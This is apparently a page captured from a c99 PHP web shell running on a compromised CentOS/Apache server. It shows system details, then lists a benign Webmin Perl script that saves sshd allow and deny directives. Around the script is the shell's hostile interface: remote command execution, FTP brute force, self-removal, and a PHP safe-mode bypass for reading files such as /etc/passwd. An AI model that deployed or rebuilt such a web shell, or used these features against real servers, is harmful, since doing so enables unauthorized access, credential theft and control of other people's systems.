!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/sshd/   drwxr-xr-x
Free 49.58 GB of 127.8 GB (38.8%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     save_access.cgi (1.87 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# save_users.cgi
# save user and group related sshd options

require './sshd-lib.pl';
&ReadParse();
&error_setup($text{'access_err'});
&lock_file($config{'sshd_config'});
$conf = &get_sshd_config();

if ($version{'type'} eq 'ssh') {
    if ($in{'allowh_def'}) {
        &save_directive("AllowHosts", $conf);
        }
    else {
        $in{'allowh'} =~ /\S/ || &error($text{'access_eallowh'});
        &save_directive("AllowHosts", $conf, $in{'allowh'});
        }

    if ($in{'denyh_def'}) {
        &save_directive("DenyHosts", $conf);
        }
    else {
        $in{'denyh'} =~ /\S/ || &error($text{'access_edenyh'});
        &save_directive("DenyHosts", $conf, $in{'denyh'});
        }
    }

$commas = $version{'type'} eq 'ssh' && $version{'number'} >= 3.2;
if ($in{'allowu_def'}) {
    &save_directive("AllowUsers", $conf);
    }
else {
    $in{'allowu'} =~ /\S/ || &error($text{'access_eallowu'});
    &save_directive("AllowUsers", $conf,
        $commas ? join(",", split(/\s+/, $in{'allowu'})) : $in{'allowu'});
    }
if ($in{'denyu_def'}) {
    &save_directive("DenyUsers", $conf);
    }
else {
    $in{'denyu'} =~ /\S/ || &error($text{'access_edenyu'});
    &save_directive("DenyUsers", $conf,
        $commas ? join(",", split(/\s+/, $in{'denyu'})) : $in{'denyu'});
    }

if ($in{'allowg_def'}) {
    &save_directive("AllowGroups", $conf);
    }
else {
    $in{'allowg'} =~ /\S/ || &error($text{'access_eallowg'});
    &save_directive("AllowGroups", $conf,
        $commas ? join(",", split(/\s+/, $in{'allowg'})) : $in{'allowg'});
    }
if ($in{'denyg_def'}) {
    &save_directive("DenyGroups", $conf);
    }
else {
    $in{'denyg'} =~ /\S/ || &error($text{'access_edenyg'});
    &save_directive("DenyGroups", $conf,
        $commas ? join(",", split(/\s+/, $in{'denyg'})) : $in{'denyg'});
    }

if ($version{'type'} eq 'ssh' && $version{'number'} < 2) {
    &save_directive("SilentDeny", $conf, $in{'silent'} ? 'yes' : 'no');
    }

&flush_file_lines();
&unlock_file($config{'sshd_config'});
&webmin_log("access");
&redirect("");


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0094 ]--